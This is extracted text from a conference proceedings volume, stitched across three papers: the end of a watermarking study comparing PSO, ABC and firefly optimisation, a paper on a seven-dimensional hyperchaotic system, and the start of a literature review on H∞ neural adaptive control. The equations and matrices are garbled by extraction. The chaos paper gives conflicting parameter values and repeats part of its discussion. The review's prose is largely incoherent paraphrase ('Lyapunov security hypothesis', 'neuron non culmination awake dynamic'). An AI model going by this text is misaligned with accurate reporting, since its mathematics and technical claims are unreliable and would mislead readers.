rithm is very efficient in solving complex problems and converges faster than the
PSO algorithm and the artificial bee algorithm. Here, the term convergence means
the algorithm reaches the optimization results more quickly than the other two algo-
rithms. The reason for its faster convergence is that the firefly algorithm’s parameters
can be tuned to control the randomness as the number of iterations proceeds. The
time complexity of the firefly algorithm is better than the PSO algorithm as in PSO,
322 P. Garg and R. Rama Kishore
Table 3 NC values of extracted watermark images using various optimization technique after
performing various attacks
S. No. Attack type Lena image Pepper image
PSO ABC Firefly PSO ABC Firefly
1 Median 0.9820 0.9607 0.9607 0.9995 1 0.9995
filtering (3*3)
2 Average 0.9684 0.9420 0.9420 0.9973 0.9995 0.9989
filtering (3*3)
3 Resizing 0.9814 0.9587 0.9587 0.9995 0.9995 0.9995
4 Rotation (20°) 0.9902 0.9883 0.9883 1 1 1
5 Histogram 0.9892 0.9793 0.9793 0.9979 0.9989 0.9984
equalization
6 Gaussian noise 0.9888 0.9424 0.9500 0.9973 0.9989 0.9995
(v = 0.001)
7 Weiner filter 0.9904 0.9689 0.9689 0.9989 1 1
(2*2)
8 Gaussian 0.9936 0.9824 0.9824 0.9995 1 1
average
filtering
9 Average 0.9720 0.9444 0.9444 0.9973 0.9995 0.9995
filtering (3*3)
10 Salt n pepper 0.9946 0.9752 0.9788 0.9872 0.9979 0.9931
noise (0.001)
11 Sharpening 0.9968 0.9909 0.9909 1 1 1
(0.8)
12 Speckle noise 0.9952 0.9872 0.9846 1 1 1
(0.001)
Average value 0.9868 0.9683 0.9690 0.9978 0.9995 0.9990
its complexity depends on the number of iterations multiplied by the square of the
population size. The ABC algorithm is very simple from the calculation perspectives
and requires very few parameters to initialize at the starting phase. It also has a high
probability of finding the correct results, but in the case of PSO algorithm, it is not
guaranteed that it always converges to a global best-optimized result. One of the
advantages of the ABC algorithm is the concept of abundant used in it, in this if
the employed bees are not able to find the optimal solution, then the bees abundant
this solution and transform to the scout bees. The success rate in the ABC algorithm
is higher than that of the PSO algorithm. One advantage of using PSO algorithm
for optimization is that it is effortless to implement, and it requires few parameters
for the calculation. From these experiments, it is apparent that all the optimization
algorithms provide the right balance between imperceptibility and robustness.
Comparative Analysis: Role of Meta-Heuristic Algorithms … 323
Table 4 BER values of extracted watermark images using various optimization technique after
performing various attacks
S. No. Attack type Lena image (BER values) Pepper image (BER values)
PSO ABC Firefly PSO ABC Firefly
1 Median 0.0083 0.0183 0.0183 0.0002 0 0.0002
filtering (3*3)
2 Average 0.0146 0.0276 0.0276 0.0012 0.0002 0.0005
filtering (3*3)
3 Resizing 0.0085 0.0193 0.0193 0.0002 0.0002 0.0002
4 Rotation (20°) 0.0017 0.0054 0.0054 0 0 0
5 Histogram 0.0049 0.0095 0.0095 0.0010 0.0005 0.0007
equalization
6 Gaussian noise 0.0051 0.0276 0.0237 0.0012 0.0005 0.0002
(v = 0.001)
7 Weiner filter 0.0044 0.0144 0.0144 0.0005 0 0
(2*2)
8 Gaussian 0.0029 0.0081 0.0081 0.0002 0 0
average
filtering
9 Average 0.0129 0.0264 0.0264 0.0012 0.0002 0.0002
filtering (3*3)
10 Salt n pepper 0.0024 0.0115 0.0100 0.0059 0.0010 0.0032
noise (0.001)
11 Sharpening 0.0015 0.0042 0.0042 0 0 0
(0.8)
12 Speckle noise 0.0022 0.0059 0.0071 0 0 0
(0.001)
Average value 0.0057 0.0148 0.0145 0.0009 0.0001 0.0004
0.995
PSO
0.99
ABC
0.985
Firefly
0.98
1 2 3 4 5 6 7 8 9 10 11 12
Attacks
324 P. Garg and R. Rama Kishore
0.98
NC Value
0.96 PSO
0.94 ABC
0.92 Firefly
0.9
1 2 3 4 5 6 7 8 9 10 11 12
Attacks
0.004
PSO
0.003
ABC
0.002
0.001 Firefly
0
1 2 3 4 5 6 7 8 9 10 11 12
Attacks
0.015 PSO
0.01 ABC
0.005 Firefly
0
1 2 3 4 5 6 7 8 9 10 11 12
Attacks
6 Conclusion
Watermarking is a technique that helps the owner have the right on their own content
available over the network. The watermark added to the cover image should not
degrade the original content’s quality, and it should also be robust against several
image processing attacks. The proposed watermarking scheme provides a right
balance between the robustness and imperceptibility characteristics and provides
Comparative Analysis: Role of Meta-Heuristic Algorithms … 325
security to the watermark. This study aims to analyze the performance of meta-
heuristic algorithms in the watermarking field and see how these can optimize the
watermark embedding and extraction process results. Here, these algorithms are used
to optimize the embedding strength factor used in the embedding process. From this
study, we can conclude that the firefly algorithm convergence faster than the other two
algorithms. The ABC algorithm requires very few initialization parameters, which
makes it more quickly than other algorithms. The results with all the three algorithms
are different even though they all are performing the same task. This is because every
algorithm has its method to find the optimal global solution. This analysis can help
the researchers to choose these algorithms according to their problem domain.
The proposed scheme provides a right balance between robustness and impercep-
tibility by optimizing the embedding strength factor using swarm intelligence algo-
rithms. Embedding watermark directly into the pixel values is not a robust method
because of that here embedding is performed on the frequency domain of the cover
image. The performance of the proposed scheme is evaluated using three param-
eters called PSNR, BER, and NC. The comparison between all three optimization
techniques shows that the proposed methodology works well against most of the
attacks and gives a PSNR value greater than 35 and an average NC value of 0.96 for
all the algorithms. In future, work can be done to analyze some other optimization
algorithms like meta-heuristic or fuzzy logic-based.
7 Conflict of Interest
References
1. Ahmadi, S. B. B., Zhang, G., & Wei, S. (2019). Robust and hybrid SVD-based image water-
marking schemes: A survey. Multimedia Tools and Applicationshttps://doi.org/10.1007/s11
042-019-08197-6
2. Cayre, F., Fontaine, C., & Furon, T. (2005). Watermarking security: Theory and practice. IEEE
Transactions on Signal Processing, 53(10), 3976–3987.
3. Cox, I., Miller, M., Bloom, J., Fridrich, J., & Kalker, T. (2007). Digital watermarking and
steganography (pp. 61–102). San Mateo: Morgan Kaufmann.
4. Agarwal, N., Singh, A., & Singh, P. (2019). Survey of robust and imperceptible watermarking.
Multimedia Tools and Applications, 78. https://doi.org/10.1007/s11042-018-7128-5
5. Abdelhakim, A., Saleh, H., & Nassar, A. (2016). Quality metric-based fitness function for robust
watermarking optimization with. Bees Algorithm IET Image Processing, 10(3), 247–252.
6. Abraham, J., & Paul, V. (2016). An imperceptible spatial domain color image watermarking
scheme. Journal of King Saud University—Computer and Information Sciences, 1–10, 31–133.
7. Garg, P., & Kishore, R. (2020). Performance comparison of various watermarking techniques.
Multimedia Tools and Applications, 79, 25921–25967.
326 P. Garg and R. Rama Kishore
8. Singh, A., Sharma, N., Dave, M., & Mohan, A. (2012). A novel technique for digital image
watermarking in spatial domain. In Proceedings of 2nd IEEE International Conference on
Parallel, Distributed and Grid Computing, PDGC (pp. 497–501).
9. Mathur, S., Dhingra, A., Prabukumar, M., Loganathan, A., & Muralibabu, K. (2016). An
efficient spatial domain based image watermarking using shell based pixel selection. In
International Conference on Advances in Computing, Communications and Informatics
(pp. 2696–2702). IEEE.
10. Bamatraf, A., Ibrahim, R., & Salleh, M. (2011). Digital watermarking algorithm using LSB.
In International Conference on Computer Applications and Industrial Electronics (ICCAIE)
(pp. 155–159). IEEE Xplore.
11. Patel, S., Mehta, T., & Pradhan, S. (2011). A unified technique for robust digital watermarking
of colour images using data mining and DCT. International Journal of Internet Technology
and Secured Transactions, 3, 81–96.
12. Pradhan, C., Saxena, V., & Bisoi, A. (2012). Non blind digital watermarking technique using
DCT and cross chaos map. In International conference on Communications, Devices and
Intelligent Systems (CODIS) (pp. 274–277). IEEE.
13. Li, N., Zheng, X., Zhao, Y., Wu, H., & Li, S. (2008). Robust algorithm of digital image
watermarking based on discrete wavelet transform. In International Symposium on Electronic
Commerce and Security (pp. 942–945). IEEE.
14. Maruturi, H., Bindu, H., & Swamy, K. (2016). A secure an invisible image watermarking
scheme based on wavelet transform in HSI color space. Procedia Computer Science, 93, 462–
468.
15. Hamidi, M., Haziti, M., Cherifi, H., & Mohammed, EL. H. (2018). Hybrid blind robust image
watermarking technique based on DFT-DCT and Arnold transform. Multimedia Tools and
Applications, 1–34.
16. Advith, J., Varun, K., & Manikantan, K. (2016). Novel digital image watermarking using
DWT-DFT-SVD in YCbCr color space (pp. 1–6). IEEE.
17. Hua, G., Huang, J., Shi, Y., Goh, J., & Thing, V. (2016). Twenty years of digital audio
watermarking—A comprehensive review. Signal Processing, 128, 222–242.
18. Singh, A., Dave, M., & Mohan, A. (2014). Hybrid technique for robust and imperceptible
multiple watermarking using medical images. Multimedia Tools Application, 1–21.
19. Perwej, Y., Parwej, F., & Perwej, A. (2012). An adaptive watermarking technique for the
copyright of digital images and digital image protection. International Journal of Multimedia
& Its Applications, 4(2), 21–38.
20. Aditya, K., Choudhary, A., Sing, M., & Adhikari, A. (2017). Image watermarking based on
cuckoo search with dwt using lévy flight algorithms (pp. 29–33). https://doi.org/10.1109/NET
ACT.2017.8076737.
21. Ansari, I., Pant, M., & Ahn, C. (2017). Secured and optimized robust image watermarking
scheme. Arabian Journal for Science and Engineering, 43. https://doi.org/10.1007/s13369-
017-2777-7.
22. Ansari, I., Pant, M., Ahn, C. W. (2017). Artificial bee colony optimized robust-reversible image
watermarking. Multimedia Tools and Applications, 76.
23. Raj, S. J., Jero, E., Ramu, P., & Swaminathan, R. (2015). Imperceptibility—Robustness tradeoff
studies for ECG steganography using continuous Ant Colony optimization. Expert Systems with
Applications, 49. https://doi.org/10.1016/j.eswa.2015.12.010.
24. Ramasamy, R., & Arumugam, V. (2020). Robust image watermarking using fractional
Krawtchouk transform with optimization. Journal of Ambient Intelligence and Humanized
Computing, 1–12.
25. Abdelhakim, A., Saleh, H., & Nassar, A. (2016). A quality guaranteed robust image
watermarking optimization with Artificial Bee Colony. Expert Systems with Applications, 72.
26. Sejpal, S., & Shah, N. (2016). A novel multiple objective optimized color watermarking scheme
based on LWT-SVD domain using nature based bat algorithm and firefly. In 2016 IEEE Inter-
national Conference on Advances in Electronics, Communication and Computer Technology
(ICAECCT) (pp. 38–44).
Comparative Analysis: Role of Meta-Heuristic Algorithms … 327
27. Sisaudia, V., & Vishwakarma, V. (2020). Copyright protection using KELM-PSO based multi-
spectral image watermarking in DCT domain with local texture information based selection.
Multimedia Tools and Applications, 1–22.
28. Maloo, S., Kumar, M., & Lakshmi, N. (2020). A modified whale optimization algorithm based
digital image watermarking approach. Sensing and Imaging, 1–22.
30. Kazemivash, B., & Ebrahimi Moghaddam, M. (2017). A robust digital image watermarking
technique using lifting wavelet transform and firefly algorithm. Multimedia Tools and
Applications, 76.
30. Moeinaddini, E. (2019). Selecting optimal blocks for image watermarking using entropy and
distinct discrete firefly algorithm. Soft Computing., 23, 1–15.
31. Karaboga, D. (2005). An idea based on Honey Bee swarm for numerical optimization
(pp. 1–10). Erciyes University, Engineering Faculty, Computer Engineering Department,
Kayseri/Türkiye, Technical report-Tr06.
32. Karaboga, D., & Basturk, B. (2007). Artificial Bee Colony (ABC) optimization algorithm for
solving constrained optimization problems. Foundations of fuzzy logic and soft computing.
In 12th International Fuzzy Systems Association World Congress, IFSA 2007 (pp. 789–798),
Cancun, Mexico 4529.
33. Karaboga, D., & Akay, B. (2009). A comparative study of artificial bee colony algorithm.
Applied Mathematics and Computation, 214(1), 108–132.
34. Kennedy, J., & Eberhart, R. (1995). Particle swarm optimization. In Proceedings of IEEE
International Conference on Neural Networks (pp. 1942–1948). Institute of Electrical and
Electronics Engineers, New York.
35. Zhou, N., Luo, A., Zou, W. P. (2018). Secure and robust watermark scheme based on multiple
transforms and particle swarm optimization algorithm. Multimedia Tools Application, 1–17.
36. Dubolia, R., Singh, R., Bhadoria, S., & Gupta, R. (2011). Digital image watermarking by using
discrete wavelet transform and discrete cosine transform and comparison based on PSNR.
In IEEE International Conference on Communication Systems and Network Technologies
(pp. 593–596).
37. Xu, H., Kang, X., Wang, Y., Wang, Y. (2018). Exploring robust and blind watermarking
approach of colour images in DWT-DCT-SVD domain for copyright protection. Inderscience
International Journal of Electronic Security and Digital Forensics, 10(1), 79–96.
38. Nguyen, P. –B., Luong, M., & Beghdadi, A. (2010). Statistical analysis of image quality metrics
for watermark transparency assessment. 6297, 685–696.
39. Lin, Y., & Abdulla, W. (2011). Objective quality measures for perceptual evaluation in digital
audio watermarking. IET Signal Processing, 5(7), 623–631.
40. Marini, E., Autrusseau, F., Le Callet, P., Campisi, P. (2007). Evaluation of standard water-
marking techniques. In Electronic Imaging, Security, Steganography, and Watermarking of
Multimedia Contents, San Jose, United States: 6505-24.
A Novel Seven-Dimensional Hyperchaotic
Abstract In this work, we consider five positive Lyapunov exponents based on state
feedback control, and this paper constructs a novel 7D hyperchaotic system. Various
significant aspects of a new mechanism, including equilibrium points, stability, and
exponents of Lyapunov, are evaluated. The computer modeling shows that complex
dynamical behaviors such as chaotic, hyperchaotic, and periodic are demonstrated
by the new system.The dynamic properties of this theoretical and numerical simu-
lation system are analyzed on the basis of equilibrium points, stability, dissipation,
Lyapunov drivers, and the phase image. In addition, different attractants or multiple
susceptibility factors with different initial conditions are investigated under the same
parameters. Moreover, hybrid synchronization between two similar and identical
systems is achieved through the nonlinear control strategy and Lyapunov stability
theory by MATLAB. A good coincidence was obtained by analyzing numerical and
theoretical system dynamics on the basis of the equilibrium points here may be a good
application in the field of encryption and nonlinear circuits for the new hyperchaotic
system.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 329
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_27
330 M. L. Thivagar et al.
were found in the literature [5, 6]. Both those methods are defined by two posi-
tive Lyapunov exponents, and the size of the hyperchaotic systems is linked to the
quantity of positive Lyapunov exponents, thus the minimum scale for hyperchaotic
structures is four [1, 7]. A hyperchaotic system is considered to be a system with
more than one positive Lyapunov inverse, while a chaotic system is called a system
only with one positive Lyapunov opposite [7, 10]. In order to maximize the amount
of positive Lyapunov derivations, the size of the system must be doubled. Lately,
there is great interest in building 5D hyperchaotic structures with three positive
Lyapunov exponents, such as the regard to the issue Hu system 2009 [7] and Yang
[8]. The hyperchaotic system with a higher dimension is effective and importable
compared to the low dimension due to its higher unpredictability and randomness and
has better performance compared to the traditional 3D, 4D, and 5D systems. Until
now, a number of works related to this subject have been increased, and numerous
papers on the construction of new high-dimensional (6D) systems with four positive
Lyapunov exponents have been published [9–14]. In 2018, Yang et al. build a 6D
hyperchaotic system with four positive Lyapunov exponents: LEA 1 = 0.4302, LEA
2 = 0.2185, LEA 3 = 0.1294, LEA 4 = 0.0775, LEA 5 = -0.0001, LEA 6 = −
12.5222, consisting of 16-term; three terms are nonlinear and| described by Eq. [13]:
⎧
⎪
⎪ ẋ1 (t) = a(x2 − x1 ) + x4 + r x6
⎪
⎪
⎪
⎪ 2 (t) = cx1 − x2 − x1 x3 + x5
⎪
⎨
ẋ
ẋ3 (t) = −bx3 + x1 x2
(1)
⎪ ẋ4 (t) = d x4 − x1 x3
⎪
⎪
⎪
⎪
⎪ ẋ5 (t) = −hx2 + x6
⎪
⎩
ẋ6 (t) = k1 x1 + k2 x2
where (x1 (t), to, x6 (t))T ∈ R 6 is the real state variables of the system (1), and
abdh = 0, a, b, c are constraint parameters, d, h, r, k1 , k2 are the control parameters.
Fig. 1 Attractors of new system: a x1 − x3 − x4 space and b x3 − x6 plane
⎧
⎪
⎪ ẋ1 (t) = a(x2 − x1 ) + x4 + r x6 − x7
⎪
⎪
⎪
⎪ ẋ2 (t) = cx1 − x2 − x1 x3 + x5
⎪
⎪
⎪
⎨ ẋ3 (t) = −bx3 + x1 x2
ẋ4 (t) = d x4 − x1 x3 (2)
⎪
⎪
⎪
⎪ ẋ5 (t) = −hx2 + x6
⎪
⎪
⎪
⎪ ẋ6 (t) = px1 + q x2
⎪
⎩
ẋ7 (t) = x1 x2 − kx7
where (x‘1 (t), to x‘7 (t))T ∈ R‘7 is the real state variables of the system (2), a, b, c,
d, h, r, k1 , k2 are the constant real parameters, k3 is The parameter of control that
defines the dynamic behavior. When a = 10, b = 8/3, c = 28, d = 2, h = 9.9, r =
1, p = 1, q = 2, and k = 12, the above system has a hyperchaotic attractor as
shown in Fig. 1. Thus, the new class system consists of 19 terms; four of them are
nonlinearities.
If the right-hand side of system (2) is equal to zero, then the equilibrium points are
solving the following equations
332 M. L. Thivagar et al.
⎧
⎪
⎪ a(x2 − x1 ) + x4 + r x6 − x7 = 0
⎪
⎪
⎪
⎪ cx1 − x2 − x1 x3 + x5 = 0
⎪
⎪
⎪
⎨ −bx3 + x1 x2 = 0
d x4 − x1 x3 = 0 (3)
⎪
⎪
⎪
⎪ −hx 2 + x6 = 0
⎪
⎪
⎪
⎪ k 1 1 + k2 x 2 = 0
x
⎪
⎩
x 1 x 2 − k3 x 7 = 0
Then it has only one equilibrium point O(0, 0, 0, 0, 0, 0, 0). The Jacobian matrix
of system (2) at origin point is
⎡ ⎤
−a a 0 1 0 r −1
⎢ c −1 0 ⎥
⎢ 0 0 1 0 ⎥
⎢ 0 −b 0 ⎥
⎢ 0 0 0 0 ⎥
⎢ ⎥
J (O) = ⎢ 0 0 0 d 0 0 0 ⎥
⎢ ⎥
⎢ 0 −h 0 0 0 1 0 ⎥
⎢ ⎥
⎣ p q 0 0 0 0 0 ⎦
0 0 0 0 0 0 −k
It is clear that some roots with positive real parts, therefore the point O is unstable.
So, the system (2) is classified as a self-excited attractors (if the system possess
unstable equilibrium points, then this system is called a system with self-excited
attractors).
A Novel Seven-Dimensional Hyperchaotic 333
The numerical simulation was carried out with Wolf algorithm and MATLAB soft-
ware, a = 9, b = 7/3, c = 27, d = 2, h = 9, r = 1, p = 1, q = 2, k = 12 System
(2) is hyperchaotic and also has five inverse of positive Lyapunov,
Assume that the structure (2) is the system of the drive and can be written as
334 M. L. Thivagar et al.
⎡ ⎤ ⎡ ⎤⎡ ⎤ ⎡ ⎤
ẋ1 −a a 0 1 0 r −1 x1 0 0 0 0
⎢ ẋ ⎥ ⎢ c 0 ⎥ ⎢x ⎥ ⎢1 0⎥
⎢ 2⎥ ⎢ −1 0 0 1 0 ⎥⎢ 2 ⎥ ⎢ 0 0 ⎥ ⎡ −x x ⎤
⎢ ẋ ⎥ ⎢ 0 −b 0 ⎥ ⎢ ⎥ ⎢ 0⎥
1 3
⎢ 3⎥ ⎢ 0 0 0 0 ⎥⎢ x3 ⎥ ⎢ 0 1 0 ⎥⎢
⎢ ⎥ ⎢ ⎥⎢ ⎥ ⎢ ⎥ ⎢ x1 x2 ⎥⎥
⎢ ẋ4 ⎥ = ⎢ 0 0 0 d 0 0 0 ⎥⎢ x4 ⎥ + ⎢ 0 0 1 0⎥⎣ (4)
⎢ ⎥ ⎢ ⎥⎢ ⎥ ⎢ ⎥ −x1 x3 ⎦
⎢ ẋ5 ⎥ ⎢ 0 −h 0 0 0 1 0 ⎥⎢ x5 ⎥ ⎢ 0 0 0 0⎥
⎢ ⎥ ⎢ ⎥⎢ ⎥ ⎢ ⎥ x1 x2
⎣ ẋ6 ⎦ ⎣ p q 0 0 0 0 0 ⎦⎣ x6 ⎦ ⎣ 0 0 0 0⎦
ẋ7 0 0 0 0 0 0 −k x7 0 0 0 1 C1
A1 B1
The A1 matrix shows the system matrix parameter (2), and the B1 . C 1 product
describes the nonlinear part of the system (2).The response system is given by:
⎡ ⎤ ⎡ ⎤ ⎛ ⎡ ⎤⎞
ẏ1 y1 u1
⎢ ẏ ⎥ ⎢y ⎥ ⎜ ⎢ u ⎥⎟ ⎡ ⎤
⎢ 2⎥ ⎢ 2⎥ ⎜ ⎢ 2 ⎥⎟ −y1 y3
⎢ ẏ ⎥ ⎢y ⎥ ⎜ ⎢ u ⎥⎟
⎢ 3⎥ ⎢ 3⎥ ⎜ ⎢ 3 ⎥⎟ ⎢ y1 y2 ⎥
⎢ ⎥ ⎢ ⎥ ⎜ ⎢ ⎥⎟
⎢ ẏ4 ⎥ = A2 ⎢ y4 ⎥ + ⎜ B2 C2 + ⎢ u 4 ⎥⎟, C2 = ⎢ ⎥
⎣ −y1 y3 ⎦ (5)
⎢ ⎥ ⎢ ⎥ ⎜ ⎢ ⎥⎟
⎢ ẏ5 ⎥ ⎢ y5 ⎥ ⎜ ⎢ u 5 ⎥⎟
⎢ ⎥ ⎢ ⎥ ⎜ ⎢ ⎥⎟ y1 y2
⎣ ẏ6 ⎦ ⎣ y6 ⎦ ⎝ ⎣ u 6 ⎦⎠
ẏ7 y7 u7
A Novel Seven-Dimensional Hyperchaotic 335
Theorem
If the control U of system (6) is designed as the following:
⎧
⎪
⎪ u1 = 2ax2 + 2x4 − r e6 + 2r x6 − ce2 − x3 e2 − pe6
⎪
⎪
⎪
⎪ u2 = −ae1 − 2cx1 − 2x5 + 2y1 x3 − x1 e3 − qe6 − x1 e7
⎪
⎪
⎪
⎨ u3 = y1 e2 − e1 e2 + x2 e1 + 2x1 x2 + y1 e4
u4 = −2de4 − e1 − x3 e1 + 2y1 x3 (7)
⎪
⎪
⎪
⎪ u5 = −2hx2 + 2x6 − e5
⎪
⎪
⎪
⎪ u6 = −2 px1 − e5 − e6
⎪
⎩
u7 = e1 − e1 e2 + x2 e1 + 2x1 x2
Proof Substitute above control in the error dynamics system (6) we get:
336 M. L. Thivagar et al.
⎧
⎪
⎪ ė = ae2 − ae1 + e4 − e7 − ce2 − x3 e2 − pe6
⎪ 1
⎪
⎪
⎪ ė2 = ce1 − e2 + e5 − y1 e3 + x3 e1 − ae1 − x1 e3 − qe6 − x1 e7
⎪
⎪
⎪
⎨ ė3 = −be3 + x1 e2 + y1 e2 + y1 e4
ė4 = −de4 − y1 e3 − e1 (8)
⎪
⎪
⎪
⎪ ė5 = −he2 + e6 − e5
⎪
⎪
⎪
⎪ ė6 = pe1 + qe2 − e5 − e6
⎪
⎩
ė7 = −ke7 + x1 e2 + e1
Clearly, all the real parts of their own values are negative, and the linearization
approach realized the chaos of the HS between the system (4) and the system (4, 5).
If the Lyapunov feature is built as
1 2
7
V (ei ) = e = [e1 , e2 , e3 , e4 , e5 , e6 , e7 ]T
2 i=1 i
⎡ ⎤⎡ ⎤
0.5 0 0 0 0 0 0 P
⎢ 0 0.5 0 0 0 0 0 ⎥⎢ e ⎥
⎢ ⎥⎢ 2 ⎥
⎢ 0 0 0.5 0 0 0 0 ⎥⎢ e ⎥
⎢ ⎥⎢ 3 ⎥
⎢ ⎥⎢ ⎥
⎢ 0 0 0 0.5 0 0 0 ⎥⎢ e4 ⎥
⎢ ⎥⎢ ⎥
⎢ 0 0 0 0 5/99 0 0 ⎥⎢ e5 ⎥
⎢ ⎥⎢ ⎥
⎣ 0 0 0 0 0 0.5 0 ⎦⎣ e6 ⎦
0 0 0 0 0 0 0.5 e7
T
10
V̇ (ei ) = e1 ė1 + e2 ė2 + e3 ė3 + e4 ė4 +
e5 ė5 + e6 ė6 + e7 ė7
99
V̇ (e) = e1 (ae2 − ae1 + e4 − e7 − ce2 − x3 e2 − pe6 )
+ e2 (ce1 − e2 + e5 − y1 e3 + x3 e1 − ae1 − x1 e3 − qe6 − x1 e7 )
A Novel Seven-Dimensional Hyperchaotic 337
+ e3 (−be3 + x1 e2 + y1 e2 + y1 e4 ) + e4 (−de4 − y1 e3 − e1 )
10
+ e5 (−he2 + e6 − e5 ) + e6 ( pe1 + qe2 − e5 − e6 )
99
+ e7 (−ke7 + x1 e2 + e1 )
⎡ ⎤⎡ ⎤
10 0 00 0 0 0 e1
⎢ 0 00 0 0 0 ⎥ ⎢ ⎥
⎢ 1 ⎥⎢ e2 ⎥
⎢ 0 8
0 0 0 0 ⎥ ⎢ ⎥
⎢ 0 ⎥⎢ e3 ⎥
T⎢ ⎥⎢ ⎥
3
V̇ (ei ) = −[e1 , e2 , e3 , e4 , e5 , e6 , e7 ] ⎢ 0 0 0 2 0 0 0 ⎥⎢ e4 ⎥
⎢ ⎥⎢ ⎥
⎢ 0 0 0 0 10/99 0 0 ⎥⎢ e5 ⎥
⎢ ⎥⎢ ⎥
⎣ 0 0 0 0 0 1 0 ⎦⎣ e6 ⎦
0 0 0 0 0 0 12 e7
where Q = diag 9, 1, 73 , 2, 10 99
, 1, 12 , so Q > 0. Consequently, V̇ (ei ) is
negative definite on R 7 . The nonlinear controller is sufficient and it achieves the HS.
Now, we will take the initial values as (15, 2, 0, −2, −3, 0) and
(−15, −10, −8, 6, 0, −4) to illustrate the HS that happened between (4) and
(5) numerically. Figures 3 and 4 verify these results numerically, respectively
(Figs. 5 and 6).
4 Dissections
The proposed work is clarified by its new positive majority parameters consider
five positive Lyapunov exponents based on state feedback control, and this paper
constructs a novel 7D hyperchaotic system. Various significant aspects of a new
mechanism, including equilibrium points, stability, and exponents of Lyapunov, are
evaluated. The computer modeling shows that complex dynamical behaviors such as
338 M. L. Thivagar et al.
chaotic, hyperchaotic, and periodic are demonstrated by the new system. The hybrid
synchronization (HS) between two extremely similar by Lyapunov stability theory
for a current scheme is also reported in this section.
Figures 1, 2, and 3 illustrate Lyapunov exponents, of the new 7D system, and
the new attractor of the proposed 7D with a = 9, b = 7/3, c = 27, d = 2, p =
1, q = 2, h = 9, r = 1, and vary. Table 1 shows the system (2) is ‘evolve Sees
results arederived from the Wolf algorithm,
in chaotic or hyperchaotic, and where
Q = diag 9, 1, 73 , 2, 10 99
, 1, 12 , so Q > 0. Consequently, V̇ (ei ) is negative
definite on R 7 . The nonlinear controller is sufficient and it achieves the HS.
5 Conclusions
In this paper, by introducing a nonlinear controller to the first equation of the five
Lorenz system, a novel seven-dimensional continuous real variable hyperchaotic
system with five positive Lyapunov exponents was suggested. In addition, with two
analytical methods, Lyapunov’s and linearization method, some characteristics of
dynamic behaviors such as equilibrium points, stability, and Lyapunov exponents are
investigated, based on nonlinear control strategy. There may be a good application
in the field of encryption and nonlinear circuits for the new hyperchaotic system.
References
1. Wang, W., & Guan, Z. H. (2006). Generalized synchronization of continuous chaotic system.
Chaos, Solitons & Fractals, 27(1), 97–101.
2. Al-Azzawi, S. F. (2012). Stability and bifurcation of Pan chaotic system by using Routh-Hurwitz
and Gardan method. Applied Mathematics and Computation, 219(3), 1144–1152.
3. Khalaf, O. I., Ajesh, F., Hamad, A. A., Nguyen, G. N., & Le, D. N. (2020). Efficient dual-
cooperative bait detection scheme for collaborative attackers on mobile ad-hoc networks. IEEE
Access, 8, 227962–227969.
4. AL-Azzawi, S. F., et al. (2020). Chaotic Lorenz system and it’s suppressed. Journal of Advanced
Research in Dynamical and Control Systems, 12(2), 548–555.
5. Zhang, G., et al. (2017). On the dynamics of new 4D Lorenz-type chaos systems. Advances in
Difference Equations, 2017(1).
6. Abed, K. A. (2020). Controlling of jerk chaotic system via linear feedback control strategies.
Indonesian Journal of Electrical Engineering and Computer Science, 20(1), 370–378.
7. Zhu, C. (2010). Control and synchronize a novel hyperchaotic system. Applied Mathematics
and Computation, 216(1), 276–284.
8. Thivagar, M. L., & Abdullah Hamad, A. (2020). A theoretical implementation for a proposed
hyper-complex chaotic system. Journal of Intelligent & Fuzzy Systems, 38(3), 2585–2595.
9. Thivagar, L. M., Hamad, A. A., & Ahmed, S. G. (2020). Conforming dynamics in the metric
spaces. Journal of Information Science and Engineering, 36(2), 279–291.
10. Thivagar, M. L., Ahmed, M. A., Ramesh, V., & Hamad, A. A. (2020). Impact of non-linear
electronic circuits and switch of chaotic dynamics. Periodicals of Engineering and Natural
Sciences, 7(4), 2070–2091.
11. Al-Azzawi, S. F., Thivagar, M. L., Al-Obeidi, A. S., & Hamad, A. A. (2020). Hybrid synchro-
nization for a novel class of 6D system with unstable equilibrium points. Materials Today:
Proceedings. https://doi.org/10.1016/j.matpr.2020.10.524.
12. Thivagar, M. L., & Hamad, A. A. (2019). Topological geometry analysis for complex dynamic
systems based on adaptive control method. Periodicals of Engineering and Natural Sciences,
7(3), 1345–1353.
13. Hamad, A. A., Al-Obeidi, A. S., & Al-Taiy, E. H. (2020). Synchronization phenomena inves-
tigation of a new nonlinear dynamical system 4D by Gardano’s and Lyapunov’s methods.
Computers, Materials & Continua, 66(3), 3311–3327.
14. Abed, F. N., Hamad, A. A., & Sapit, A. B. (2020). The effect analysis for the nano powder
dielectric processing of ti-6242 alloy is performed on wire cut-electric, discharge. Materials
Today Proceedings. https://doi.org/10.1016/j.matpr.2020.09.368.
A Literature Review on H∞ Neural
Network Adaptive Control
Parul Kashyap
Abstract In this literature survey, the writing reachable for the H∞ adaptive
control engineering utilizing neural systems for frameworks whose uncertainty has
an ambiguous structure. This engineering merge thoughts from powerful control
hypothesis, for example, H∞ control structure, the little addition hypothesis, and
L dependability hypothesis with Lyapunov security hypothesis and current hypo-
thetical accomplishments in uncertainty control to build up an adaptive design for
frameworks whose vagueness fulfills a neighborhood Lipschitz bound. The strategy
enables a control originator to rearrange adaptive tuning method, band limit adaptive
control sign, in addition indulgence unequaled vagueness in a solitary plan system.
Powerful control configuration limits the impact of uncertainty and nonlinearity to
the detriment of diminished execution. The plan outline work is like that utilized in
powerful control, yet without giving up execution. The majority of this is adjusted,
while giving thoughts of transient execution limits subject to the qualities of two
straight frameworks and the adjustment gain. The relevance of neural networks in the
control systems, feed forward neural networks direct and indirect adaptive controls,
H∞ controller is also reviewed.
1 Introduction
P. Kashyap (B)
Department of Electrical Engineering, Madan Mohan Malaviya University of Technology,
Gorakhpur, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 341
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_28
342 P. Kashyap
2 Neural Networks
By displaying neuron, neural system times past could be pursued back. The primary
representation of a nerve cell was utilized by physiologists, McCulloch with Pitts.
The primary demonstrated neuron was by means of single yield just as dual fonts of
statistics. They build up by unbiased single statistics energetic, neuron non culmina-
tion awake dynamic. Twofold yield was found for information were of single and a
similar weight, the yield observed zero data sources calculated to sift seize esteem.
